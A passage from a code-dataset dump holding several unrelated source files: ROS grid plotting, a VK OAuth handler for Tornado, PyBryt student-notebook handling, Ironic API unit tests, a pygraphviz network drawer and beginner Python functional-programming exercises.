height\n\tglobal grid\n\tglobal obstacles_pub\n\tglobal start\n\tglobal goal\n\n\trospy.init_node('Color')\n\n\tgrid = list()\n\tstart = (0,0)\n\n\tfrontier_pub = rospy.Publisher('frontier', GridCells, queue_size=10)\n\t# explored_pub = rospy.Publisher('explored', GridCells, queue_size=10)\n\t# shortpath_pub = rospy.Publisher('shortpath', GridCells, queue_size=10)\n\tobstacles_pub = rospy.Publisher('obstacles', GridCells, queue_size=10)\n\tunexplored_pub = rospy.Publisher('unexplored', GridCells, queue_size=10)\n\n\tinitpose_sub = rospy.Subscriber('start_pose', PoseStamped, startPoseCallback, queue_size=10)\n\tfinalpose_sub = rospy.Subscriber('goal_pose', PoseStamped, endPoseCallback, queue_size=10)\n\toccupancygrid_sub = rospy.Subscriber('map', OccupancyGrid, mapCallBack, queue_size=10)\n\nwhile not rospy.is_shutdown():\n\tstoreobs = []\n\tstoreunex = []\n\n\t# frontier\n\t# frontier=GridCells()\n\t# frontier.header.frame_id = 'map'\n\t# frontier.cell_width = 0.3\n\t# frontier.cell_height = 0.3\n\t# frontier.cells = \n\t# frontier.cells.append(Point(1,1,0))\n\n\t# explored\n\t# explored=GridCells()\n\t# explored.header.frame_id = 'map'\n\t# explored.cell_width = 0.3\n\t# explored.cell_height = 0.3\n\t# explored.cells.append(Point(1,2,0))\n\n\t# shortestpath\n\t# shortpath=GridCells()\n\t# shortpath.header.frame_id = 'map'\n\t# shortpath.cell_width = 0.3\n\t# shortpath.cell_height = 0.3\n\t# shortpath.cells.append(Point(1,3,0))\n\n\t# unexplored\n\tunexplored=GridCells()\n\tunexplored.header.frame_id = 'map'\n\tunexplored.cell_width = 0.3\n\tunexplored.cell_height = 0.3\n\tunexplored.cells = storeunex\n\n\t# publish\n\t# frontier_pub.publish(frontier)\n\t# frontier_pub.publish(explored)\n\t#frontier_pub.publish(obstacles)\n\t#frontier_pub.publish(unexplored)\n\t# frontier_pub.publish(shortpath)\n\trospy.sleep(rospy.Duration(1))\n\n\tdrawWalls(grid)\n\n\ttry:\n\t\tgoal\n\texcept NameError:\n\t\tcontinue\n\telse:\n\t\taStar(start, goal, grid)\n\n","sub_path":"src/lab3/ColorGrid1.py","file_name":"ColorGrid1.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341501437","text":"class Solution:\n def is_anagram(self, s: str, t: str) -> bool:\n\n if len(s) != len(t):\n return False\n\n countS, countT = {}, {}\n\n for i in range(len(s)):\n countS[s[i]] = 1 + countS.get(s[i], 0)\n countT[t[i]] = 1 + countT.get(t[i], 0)\n\n return countS == countT\n\n\nprint(Solution().is_anagram(\"anagramw\", \"nagaram\"))\n\n\n# rotate string\nstr = \"indal\"\nsize = len(str)\ntemp = str+str\n\nfor x in range(size):\n for y in range(size):\n print(temp[x+y], end=\" \")\n print()\n","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"166187274","text":"from custom_utils.science.imports import *\nfrom custom_utils.science import basics as sb\nfrom scipy.constants import h\n\nco = sb.dataframe_from_csv(\"../data/DERNER_CO.PRN\", sep=\" \", header=None)\n\n\ndef plot_co(show=False, save=False):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n ax.plot(co[0], co[1], \"k\", lw=0.5)\n\n ax.set_xlabel(r\"$\\nu[\\si{\\per\\centi\\metre}]$\")\n ax.set_ylabel(r\"Transmitance\")\n # ax.legend()\n ax.autoscale(True, \"x\", True)\n fig.tight_layout()\n\n if show:\n plt.show()\n if save:\n fig.savefig(\"../fig/co.pdf\")\n\n plt.close(fig)\n\n\nu1 = 
sb.dataframe_from_csv(\"../data/Tomas_Derner_CO.csv\")\nu1 = pd.DataFrame({\"Wavenumber\": u1.Wavenumber.values})\n\nu1_p = u1[:19]\nu1_p = u1_p[::-1].reset_index(drop=True)\nu1_p.set_index(u1_p.index.values + 1, inplace=True)\nu1_r = u1[19:].reset_index(drop=True)\nu1_p = u1_p * 1e2\nu1_r = u1_r * 1e2\n\ny_df = u1_r - u1_p\ny = y_df.Wavenumber.values / (2 * y_df.index.values + 1)\n\nx = (2 * y_df.index.values + 1)**2\n\n\ndef plot_u1_1(show=False, save=False):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n fit = sb.FitCurve(sb.f_line, x[1:-1], y[1:-1])\n\n ax.plot(*fit.curve(), \":\", c=\"grey\")\n ax.plot(x, y, \"kx\", label=\"values\")\n\n ax.set_xlabel(r\"x label\")\n ax.set_ylabel(r\"y label\")\n ax.legend()\n fig.tight_layout()\n\n if show:\n plt.show()\n if save:\n fig.savefig(\"../fig/u1_1.pdf\")\n\n plt.close(fig)\n\n return fit\n\n\nfit = plot_u1_1()\na = fit.params[0]\nD_1 = -a / h\nc = fit.params[1]\nB_1 = (c / h + 3 * D_1) / 2\n\n\nu3 = sb.dataframe_from_csv(\"../data/DERNER_VZDUCH.PRN\", sep=\" \", header=None)\n\n\ndef plot_u3(show=False, save=False):\n\n fig, (ax1, ax2) = plt.subplots(nrows=2, figsize=(6, 4))\n\n df = u3[(600 <= u3[0]) & (u3[0] <= 720)]\n ax1.plot(df[0], df[1], \"k\", lw=0.5)\n ax1.set_xlabel(r\"$\\\nu[\\\si{\\\per\\\centi\\\metre}]$\")\n ax1.set_ylabel(r\"Transmitance\")\n ax1.set_ylim(0.017, 0.031)\n ax1.autoscale(True, \"x\", True)\n\n df = u3[(2230 <= u3[0]) & (u3[0] <= 2400)]\n ax2.plot(df[0], df[1], \"k\", lw=0.5)\n ax2.set_xlabel(r\"$\\\nu[\\\si{\\\per\\\centi\\\metre}]$\")\n ax2.set_ylabel(r\"Transmitance\")\n ax2.autoscale(True, \"x\", True)\n\n fig.tight_layout()\n\n if show:\n plt.show()\n if save:\n fig.savefig(\"../fig/u3.pdf\")\n\n plt.close(fig)\n","sub_path":"20/comp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"283361120","text":"from tornado import web\nfrom tornado import httpclient\n\n\nclass OAuthVk(web.RequestHandler):\n    \"\"\"VK OAuth authorization\n    on_success(HTTPResponse response) - called when no errors occurred,\n    response - the response from the vk server\n    on_error(error) - called when an error occurs\n    error - a string with a description, or an exception\n    \"\"\"\n\n    _ACCESS_TOKEN_URL = 'https://oauth.vk.com/access_token'\n    _AUTHORIZE_URL = 'https://oauth.vk.com/authorize'\n    _APP_ID_ = '' # application id (from the vk app settings)\n    _REDIRECT_URL_ = '' # www.yousite.com/oauth\n    _CLIENT_SECRET_ = '' # the application's secure key (from the vk app settings)\n\n    def __init__(self, *args):\n        super().__init__(*args)\n\n        params = {'client_id': self._APP_ID_,\n                  'redirect_uri': self._REDIRECT_URL_,\n                  # 'scope': str(2),\n                  }\n        token_params = {'client_id': self._APP_ID_,\n                        'client_secret': self._CLIENT_SECRET_,\n                        'redirect_uri': self._REDIRECT_URL_,\n                        }\n        self.token_url = self._ACCESS_TOKEN_URL + '?' + '&'.join([k + '=' + v for k, v in token_params.items()])\n        self.code_url = self._AUTHORIZE_URL + '?' 
+ '&'.join([k + '=' + v for k, v in params.items()]) + '&code='\n\n    async def get(self):\n        vk_code = self.get_argument('code', default=None)\n        if vk_code:\n            a_http = httpclient.AsyncHTTPClient()\n            try:\n                response = await a_http.fetch(self.token_url + '&code=' + vk_code)\n            except Exception as e:\n                self.on_error(e)\n            else:\n                self.on_success(response)\n        else:\n            self.redirect(self.code_url)\n\n    def on_success(self, response):\n        \"\"\"called on successful authorization\"\"\"\n        raise NotImplementedError(\"on_success\")\n\n    def on_error(self, error):\n        \"\"\"called on error\"\"\"\n        raise NotImplementedError(\"on_error\")\n","sub_path":"vk_oauth.py","file_name":"vk_oauth.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"205363164","text":"\"\"\"Student implementations for PyBryt\"\"\"\n\nimport os\nimport dill\nimport base64\nimport nbformat\n\nfrom typing import Any, List, NoReturn, Optional, Tuple, Union\n\nfrom .reference import ReferenceImplementation, ReferenceResult\nfrom .execution import execute_notebook\n\n\nNBFORMAT_VERSION = 4\n\n\nclass StudentImplementation:\n    \"\"\"\n    A student implementation class for handling the execution of student work and managing the \n    memory footprint generated by that execution.\n\n    Args:\n        path_or_nb (``str`` or ``nbformat.NotebookNode``): the submission notebook or the path to it\n        addl_filenames (``list[str]``, optional): additional filenames to trace inside during \n            execution\n        output (``str``, optional): a path at which to write executed notebook\n    \"\"\"\n\n    nb: nbformat.NotebookNode\n    \"\"\"the submission notebook\"\"\"\n\n    values: List[Tuple[Any, float]]\n    \"\"\"the memory footprint (a list of tuples of objects and their timestamps)\"\"\"\n\n    start: float\n    \"\"\"execution start time\"\"\"\n\n    end: float\n    \"\"\"execution end time\"\"\"\n\n    def __init__(\n        self, path_or_nb: Union[str, nbformat.NotebookNode], addl_filenames: List[str] = [],\n        output: Optional[str] = None\n    ):\n        if isinstance(path_or_nb, str):\n            self.nb = nbformat.read(path_or_nb, as_version=NBFORMAT_VERSION)\n        elif isinstance(path_or_nb, nbformat.NotebookNode):\n            self.nb = path_or_nb\n        else:\n            raise ValueError(f\"path_or_nb is of unsupported type {type(path_or_nb)}\")\n\n        self._execute(addl_filenames=addl_filenames, output=output)\n\n    def _execute(self, addl_filenames: List[str] = [], output: Optional[str] = None) -> NoReturn:\n        \"\"\"\n        Executes the notebook ``self.nb``.\n\n        Args:\n            addl_filenames (``list[str]``, optional): additional filenames to trace inside during \n                execution\n            output (``str``, optional): a path at which to write executed notebook\n        \"\"\"\n        self.start, self.end, self.values = execute_notebook(\n            self.nb, addl_filenames=addl_filenames, output=output\n        )\n\n    def dump(self, dest: str = \"student.pkl\") -> NoReturn:\n        \"\"\"\n        Pickles this student implementation to a file.\n\n        Args:\n            dest (``str``, optional): the path to the file\n        \"\"\"\n        with open(dest, \"wb+\") as f:\n            dill.dump(self, f)\n\n    def dumps(self) -> str:\n        \"\"\"\n        Pickles this student implementation to a base-64-encoded string.\n\n        Returns:\n            ``str``: the pickled and encoded student implementation\n        \"\"\"\n        bits = dill.dumps(self)\n        return base64.b64encode(bits).decode(\"ascii\")\n\n    @staticmethod\n    def load(file: str) -> 'StudentImplementation':\n        \"\"\"\n        Unpickles a student implementation from a file.\n\n        Args:\n            file (``str``): the path to the file\n        \n        Returns:\n            :py:class:`StudentImplementation`: the 
unpickled student \n implementation\n \"\"\"\n with open(file, \"rb\") as f:\n instance = dill.load(f)\n return instance\n\n @classmethod\n def loads(cls, data: str) -> \"StudentImplementation\":\n \"\"\"\n Unpickles a student implementation from a base-64-encoded string.\n\n Args:\n data (``str``): the pickled and encoded student implementation\n \n Returns:\n :py:class:`StudentImplementation`: the unpickled student \n implementation\n \"\"\"\n return dill.loads(base64.b64decode(data.encode(\"ascii\")))\n\n def check(self, ref: Union[ReferenceImplementation, List[ReferenceImplementation]], group=None) -> \\\n Union[ReferenceResult, List[ReferenceResult]]:\n \"\"\"\n Checks this student implementation against a single or list of reference implementations.\n Returns the :py:class:`ReferenceResult` object(s) resulting from \n those checks.\n\n Args:\n ref (``ReferenceImplementation`` or ``list[ReferenceImplementation]``): the reference(s)\n to run against\n group (``str``, optional): if specified, only annotations in this group will be run\n\n Returns:\n ``ReferenceResult`` or ``list[ReferenceResult]``: the results of the reference \n implementation checks\n \"\"\"\n if isinstance(ref, ReferenceImplementation):\n return ref.run(self.values, group=group)\n elif isinstance(ref, list):\n return [r.run(self.values, group=group) for r in ref]\n else:\n raise ValueError(f\"check cannot take values of type '{type(ref)}'\")\n \n def check_plagiarism(self, student_impls: List[\"StudentImplementation\"], **kwargs) -> List[ReferenceResult]:\n \"\"\"\n Checks this student implementation against a list of other student implementations for \n plagiarism. Uses :py:meth:`create_references` to create\n a randomly-generated reference implementation from this student implementation and runs it\n against each of the implementations in ``student_impls`` using \n :py:meth:`get_impl_results`.\n\n Args:\n student_impls (``list[StudentImplementation]``): other student implementations to run\n against\n **kwargs: keyword arguments passed to \n :py:meth:`create_references` and \n :py:meth:`get_impl_results`\n \n Returns:\n ``list[ReferenceResult]`` or ``numpy.ndarray``: the results of each student \n implementation in ``student_impls`` when run against this student implementation\n \"\"\"\n refs = create_references([self], **kwargs)\n return get_impl_results(refs[0], student_impls, **kwargs)\n\n\nfrom .plagiarism import create_references, get_impl_results\n","sub_path":"pybryt/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"77379695","text":"# Copyright 2013 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nfrom oslo_config import cfg\nfrom oslo_utils import uuidutils\nimport pecan\nimport wsme\n\nfrom ironic.api.controllers.v1 import utils\nfrom ironic.common import exception\nfrom ironic import objects\nfrom ironic.tests.api import utils as test_api_utils\nfrom ironic.tests import base\n\nCONF = cfg.CONF\n\n\nclass TestApiUtils(base.TestCase):\n\n    def test_validate_limit(self):\n        limit = utils.validate_limit(10)\n        self.assertEqual(10, limit)\n\n        # max limit\n        limit = utils.validate_limit(999999999)\n        self.assertEqual(CONF.api.max_limit, limit)\n\n        # negative\n        self.assertRaises(wsme.exc.ClientSideError, utils.validate_limit, -1)\n\n        # zero\n        self.assertRaises(wsme.exc.ClientSideError, utils.validate_limit, 0)\n\n    def test_validate_sort_dir(self):\n        sort_dir = utils.validate_sort_dir('asc')\n        self.assertEqual('asc', sort_dir)\n\n        # invalid sort_dir parameter\n        self.assertRaises(wsme.exc.ClientSideError,\n                          utils.validate_sort_dir,\n                          'fake-sort')\n\n\nclass TestNodeIdent(base.TestCase):\n\n    def setUp(self):\n        super(TestNodeIdent, self).setUp()\n        self.valid_name = 'my-host'\n        self.valid_uuid = uuidutils.generate_uuid()\n        self.invalid_name = 'Mr Plow'\n        self.invalid_uuid = '636-555-3226-'\n        self.node = test_api_utils.post_get_test_node()\n\n    @mock.patch.object(pecan, 'request')\n    def test_allow_node_logical_names_pre_name(self, mock_pecan_req):\n        mock_pecan_req.version.minor = 1\n        self.assertFalse(utils.allow_node_logical_names())\n\n    @mock.patch.object(pecan, 'request')\n    def test_allow_node_logical_names_post_name(self, mock_pecan_req):\n        mock_pecan_req.version.minor = 5\n        self.assertTrue(utils.allow_node_logical_names())\n\n    def test_is_valid_node_name(self):\n        self.assertTrue(utils.is_valid_node_name(self.valid_name))\n        self.assertFalse(utils.is_valid_node_name(self.invalid_name))\n        self.assertFalse(utils.is_valid_node_name(self.valid_uuid))\n        self.assertFalse(utils.is_valid_node_name(self.invalid_uuid))\n\n    @mock.patch.object(pecan, 'request')\n    @mock.patch.object(utils, 'allow_node_logical_names')\n    @mock.patch.object(objects.Node, 'get_by_uuid')\n    @mock.patch.object(objects.Node, 'get_by_name')\n    def test_get_rpc_node_expect_uuid(self, mock_gbn, mock_gbu, mock_anln,\n                                      mock_pr):\n        mock_anln.return_value = True\n        self.node['uuid'] = self.valid_uuid\n        mock_gbu.return_value = self.node\n        self.assertEqual(self.node, utils.get_rpc_node(self.valid_uuid))\n        self.assertEqual(1, mock_gbu.call_count)\n        self.assertEqual(0, mock_gbn.call_count)\n\n    @mock.patch.object(pecan, 'request')\n    @mock.patch.object(utils, 'allow_node_logical_names')\n    @mock.patch.object(objects.Node, 'get_by_uuid')\n    @mock.patch.object(objects.Node, 'get_by_name')\n    def test_get_rpc_node_expect_name(self, mock_gbn, mock_gbu, mock_anln,\n                                      mock_pr):\n        mock_anln.return_value = True\n        self.node['name'] = self.valid_name\n        mock_gbn.return_value = self.node\n        self.assertEqual(self.node, utils.get_rpc_node(self.valid_name))\n        self.assertEqual(0, mock_gbu.call_count)\n        self.assertEqual(1, mock_gbn.call_count)\n\n    @mock.patch.object(pecan, 'request')\n    @mock.patch.object(utils, 'allow_node_logical_names')\n    @mock.patch.object(objects.Node, 'get_by_uuid')\n    @mock.patch.object(objects.Node, 'get_by_name')\n    def test_get_rpc_node_invalid_name(self, mock_gbn, mock_gbu,\n                                       mock_anln, mock_pr):\n        mock_anln.return_value = True\n        self.assertRaises(exception.InvalidUuidOrName,\n                          utils.get_rpc_node,\n                          self.invalid_name)\n\n    
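# Note on the stacked mock.patch.object decorators used in these tests: mock\n    # applies them bottom-up, so the innermost patch (get_by_name) arrives as the\n    # first test argument (mock_gbn), then get_by_uuid (mock_gbu),\n    # allow_node_logical_names (mock_anln) and finally pecan.request (mock_pr).\n    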
@mock.patch.object(pecan, 'request')\n @mock.patch.object(utils, 'allow_node_logical_names')\n @mock.patch.object(objects.Node, 'get_by_uuid')\n @mock.patch.object(objects.Node, 'get_by_name')\n def test_get_rpc_node_invalid_uuid(self, mock_gbn, mock_gbu,\n mock_anln, mock_pr):\n mock_anln.return_value = True\n self.assertRaises(exception.InvalidUuidOrName,\n utils.get_rpc_node,\n self.invalid_uuid)\n\n @mock.patch.object(pecan, 'request')\n @mock.patch.object(utils, 'allow_node_logical_names')\n @mock.patch.object(objects.Node, 'get_by_uuid')\n @mock.patch.object(objects.Node, 'get_by_name')\n def test_get_rpc_node_by_uuid_no_logical_name(self, mock_gbn, mock_gbu,\n mock_anln, mock_pr):\n # allow_node_logical_name() should have no effect\n mock_anln.return_value = False\n self.node['uuid'] = self.valid_uuid\n mock_gbu.return_value = self.node\n self.assertEqual(self.node, utils.get_rpc_node(self.valid_uuid))\n self.assertEqual(1, mock_gbu.call_count)\n self.assertEqual(0, mock_gbn.call_count)\n\n @mock.patch.object(pecan, 'request')\n @mock.patch.object(utils, 'allow_node_logical_names')\n @mock.patch.object(objects.Node, 'get_by_uuid')\n @mock.patch.object(objects.Node, 'get_by_name')\n def test_get_rpc_node_by_name_no_logical_name(self, mock_gbn, mock_gbu,\n mock_anln, mock_pr):\n mock_anln.return_value = False\n self.node['name'] = self.valid_name\n mock_gbn.return_value = self.node\n self.assertRaises(exception.NodeNotFound,\n utils.get_rpc_node,\n self.valid_name)\n","sub_path":"ironic/tests/api/v1/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"647654900","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 10 12:55:48 2019\n\n@author: belisa\n\"\"\"\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pygraphviz as pgv\n\nclass graph(object):\n def __init__(self, fin_occ, fin_trans, hubs=None, ffac=0.05, facbothdir=0.8,\n dpi=100, cmap='nipy_spectral_r', \n directed=True, nodesep=0.5, splines=\"false\", \n outputorder=\"edgesfirst\", overlap=\"scale\", shift_color=0.8,\n min_size_nodes=0, fac_size_nodes=0.5, nodeshape='circle',\n nodecolor='black', nodefillcolor='black', nodestyle='filled', \n nodelabel='', nodefontsize='10', hubnodeshape='doublecircle',\n hubnodecolor='black', hubnodefillcolor='black',\n hubnodestyle='filled', hubnodelabel='', hubnodefontsize='10',\n node_pos_hfac=1, node_pos_wfac=1,\n min_size_edges=2.5, fac_size_edges=5,\n style_sym_edges=None, style_asym_edges=[\"dashed\", \"dotted\"]):\n \n super(graph, self).__init__()\n \n self.fin_occ=fin_occ\n self.fin_trans=fin_trans\n self.hubs=hubs\n self.ffac=ffac\n self.facbothdir=facbothdir\n self.cmap=plt.get_cmap(cmap)\n self.shift_color=shift_color\n self.min_size_nodes=min_size_nodes\n self.fac_size_nodes=fac_size_nodes\n \n self.nodeshape=nodeshape\n self.nodecolor=nodecolor\n self.nodefillcolor=nodefillcolor\n self.nodestyle=nodestyle\n self.nodelabel=nodelabel\n self.nodefontsize=nodefontsize\n if hubs:\n self.hubnodeshape=hubnodeshape\n self.hubnodecolor=hubnodecolor\n self.hubnodefillcolor=hubnodefillcolor\n self.hubnodestyle=hubnodestyle\n self.hubnodelabel=hubnodelabel\n self.hubnodefontsize=hubnodefontsize\n \n self.node_pos_hfac=node_pos_hfac\n self.node_pos_wfac=node_pos_wfac\n \n self.min_size_edges=min_size_edges\n self.fac_size_edges=fac_size_edges\n self.style_sym_edges=style_sym_edges\n 
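# Edge-style bookkeeping: near-symmetric two-way transitions are drawn once\n        # with style_sym_edges (when given), while unbalanced pairs fall back to the\n        # two entries of style_asym_edges stored below (dominant direction first).\n        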
self.style_asym_edges=style_asym_edges \n \n #initializing graph\n self.G = pgv.AGraph(directed=directed, nodesep=nodesep, \n splines=splines, outputorder=outputorder, \n overlap=overlap, dpi=dpi)\n \n self.h = self.occupancy_matrix_from_file()\n self.nodes, self.edges, self.source, self.target, self.f, self.fmin, self.fmax, self.flen = self.sep_transitions_data_from_file() \n \n def occupancy_matrix_from_file(self):\n h = np.loadtxt(self.fin_occ)\n \n maxh = 0\n for j in h:\n maxh = max(maxh, max(j))\n \n return h.T/maxh\n \n def sep_transitions_data_from_file(self):\n source = []\n target = []\n f = []\n with open(self.fin_trans) as fp:\n for j, line in enumerate(fp): \n a,b,c,d,e = line.split()\n \n source.append((int(a),int(b)))\n target.append((int(c),int(d)))\n f.append(float(e))\n \n f = np.array(f)/sum(f)\n fmax = max(f)\n f /= fmax\n fmin = min(f)\n fmax2 = max(f)\n flen = fmax2-fmin\n \n idx_good = [k for k,x in enumerate(f) if x > self.ffac*fmax2]\n f = f[idx_good]\n \n source = [x for k,x in enumerate(source) if k in idx_good]\n target = [x for k,x in enumerate(target) if k in idx_good]\n nodes = list(set(source+target))\n edges = list(zip(source,target))\n \n return nodes, edges, source, target, f, fmin, fmax, flen\n \n def dir_edges(self):\n edges_dec = []\n edges_inc = []\n \n f_dec = []\n f_inc = []\n \n for ((a,b),(c,d),e) in zip(self.source,self.target,self.f):\n if c > a:\n direc = 'inc'\n elif c < a:\n direc = 'dec'\n elif c == a:\n if d > b:\n direc = 'inc'\n elif d < b:\n direc = 'dec'\n \n if direc == 'dec':\n edges_dec.append(((a,b),(c,d)))\n f_dec.append(e)\n elif direc == 'inc':\n edges_inc.append(((a,b),(c,d)))\n f_inc.append(e)\n \n return edges_dec, f_dec, edges_inc, f_inc\n \n def add_nodes(self):\n for (a,b) in self.nodes:\n pos=str(self.node_pos_wfac*a)+','+str(self.node_pos_hfac*b)+'!'\n color, width = color_n_width(self.h[a-1][b-1], self.cmap, self.shift_color, \n self.min_size_nodes, \n self.fac_size_nodes, \n self.fmin, self.flen)\n \n if self.hubs and (a,b) in self.hubs:\n print(a,b)\n self.G.add_node((int(a),int(b)), width=width, shape=self.hubnodeshape,\n color=self.hubnodecolor, fillcolor=self.hubnodefillcolor, \n fixedsize='true', fontsize=self.hubnodefontsize, \n style=self.hubnodestyle, label=self.hubnodelabel, pos=pos)\n else:\n self.G.add_node((int(a),int(b)), width=width, shape=self.nodeshape,\n color=self.nodecolor, fillcolor=self.nodefillcolor, \n fixedsize='true', fontsize=self.nodefontsize, \n style=self.nodestyle, label=self.nodelabel, pos=pos)\n \n def add_edges(self):\n edges = []\n \n edges_dec, f_dec, edges_inc, f_inc = self.dir_edges() \n \n fac1 = self.min_size_edges\n fac2 = self.fac_size_edges\n j = 0\n for (a,b) in edges_dec:\n color1, ewidth1 = color_n_width(f_dec[j], self.cmap, self.shift_color, fac1, fac2, \n self.fmin, self.flen)\n if (b,a) in edges_inc:\n k = edges_inc.index((b,a))\n fmx = max(f_dec[j],f_inc[k])\n fmn = min(f_dec[j],f_inc[k])\n \n color, ewidth = color_n_width(fmx, self.cmap, self.shift_color, fac1, fac2, \n self.fmin, self.flen)\n color2, ewidth2 = color_n_width(f_inc[k], self.cmap, self.shift_color, fac1, fac2, \n self.fmin, self.flen)\n \n if fmx and fmn:\n fmx = max(f_dec[j],f_inc[k])\n fmn = min(f_dec[j],f_inc[k])\n \n if fmn/fmx > self.facbothdir:\n if self.style_sym_edges:\n self.G.add_edge((a,b), color=color, penwidth=ewidth, \n style=self.style_sym_edges, dir=\"both\")\n else:\n self.G.add_edge((a,b), color=color, \n penwidth=ewidth, dir=\"both\")\n edges.append((a,b))\n edges.append((b,a))\n else: 
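# asymmetric pair: the dominant direction gets style_asym_edges[0], the weaker one style_asym_edges[1]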
\n                            if f_dec[j] > f_inc[k]:\n                                style1 = self.style_asym_edges[0]\n                                style2 = self.style_asym_edges[1]\n                            else:\n                                style1 = self.style_asym_edges[1]\n                                style2 = self.style_asym_edges[0]\n                            self.G.add_edge(a,b, color=color1, \n                                            penwidth=ewidth1, style=style1)\n                            self.G.add_edge(b,a, color=color2, \n                                            penwidth=ewidth2, style=style2)\n                            edges.append((a,b))\n                            edges.append((b,a))\n                \n                elif fmn is None:\n                    if f_dec[j]:\n                        self.G.add_edge((a,b), color=color1, penwidth=ewidth1, \n                                        style=self.style_asym_edges[0])\n                        edges.append((a,b))\n                    elif f_inc[k]:\n                        self.G.add_edge((b,a), color=color2, penwidth=ewidth2, \n                                        style=self.style_asym_edges[0]) \n                        edges.append((b,a))\n            else:\n                if f_dec[j]:\n                    self.G.add_edge((a,b), color=color1, penwidth=ewidth1, \n                                    style=self.style_asym_edges[0])\n                    edges.append((a,b))\n            j+=1\n        \n        j = 0\n        for (a,b) in edges_inc:\n            if (a,b) not in edges:\n                if f_inc[j]:\n                    color2, ewidth2 = color_n_width(f_inc[j], self.cmap, self.shift_color, fac1, fac2, \n                                                    self.fmin, self.flen)\n                    self.G.add_edge((a,b), color=color2, penwidth=ewidth2, \n                                    style=self.style_asym_edges[0])\n            \n            j+=1\n    \n    def draw_graph(self, graphname, fmt='eps'):\n        try:\n            self.add_nodes()\n            self.add_edges()\n            \n            print('Drawing '+graphname)\n            self.G.draw(graphname, prog='neato', format=fmt)\n            \n        except NameError:\n            print(\"Error: it was not possible to draw the network.\")\n            print(\"Please try choosing a different value for ffac or facbothdir.\")\n            print(\"Alternatively, set spline='false'.\")\n\n###############################################################################\n\ndef color_n_width(a, cmap, m, fac1, fac2, vmin, vlen):\n    color = cmap((a-m*vmin)/vlen)\n    color = mpl.colors.rgb2hex(color)\n    width = fac1+fac2*a\n    \n    return color, width\n","sub_path":"GraphNetwork.py","file_name":"GraphNetwork.py","file_ext":"py","file_size_in_byte":10116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"423458723","text":"# -*- coding: utf-8 -*-\ndef add(x, y, f):\n    return f(x) + f(y)\nprint(add(-5, 6, abs))\n#Map/Reduce\ndef normalize(name):\n    Name = name.title()\n    return Name\n# Test:\nL1 = ['adam', 'LISA', 'barT']\nL2 = list(map(normalize, L1))\nprint(L2)\n#=====\nfrom functools import reduce\ndef prod(L):\n    return reduce(lambda x, y: x*y, L)\nprint('3 * 5 * 7 * 9 =', prod([3, 5, 7, 9]))\nif prod([3, 5, 7, 9]) == 945:\n    print('Success!')\nelse:\n    print('Fail!')\n#=====\ndef str2float(s):\n    DIGITS = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9}\n    s = s.split('.')\n\n    def fn(x, y):\n        return x * 10.0 + y\n    def char2num(s):\n        return DIGITS[s]\n    return reduce(fn, map(char2num, s[0])) + reduce(fn, map(char2num, s[1])) / (10 ** len(s[1]))\nprint('str2float(\\'123.456\\') =', str2float('123.456'))\nif abs(str2float('123.456') - 123.456) < 0.00001:\n    print('Success!')\nelse:\n    print('Fail!')\n#Map/Reduce END\n#Filter\ndef not_empty(s):\n    return s and s.strip()\nprint(list(filter(not_empty, ['A', '', ' B', None, 'C', '  '])))\n#Prime number\ndef _odd_iter():\n    n = 1\n    while True:\n        n = n + 2\n        yield n\n\ndef _not_divisible(n):\n    return lambda x: x % n > 0\n\ndef primes():\n    yield 2\n    it = _odd_iter()\n    while True:\n        n = next(it)\n        yield n\n        it = filter(_not_divisible(n), it)\n\nfor n in primes(): #printPrimes\n    if n < 100:\n        print(n)\n    else:\n        break\n#=====\n# def _nums_iter():\n#     yield n\n#     n = 1\n#     while True:\n#         n = n + 1\ndef is_palindrome(n):\n    n1 = str(n)\n    return n1 == n1[::-1]\n# Test:\noutput = filter(is_palindrome, range(1, 1000))\nprint('1~1000:', 
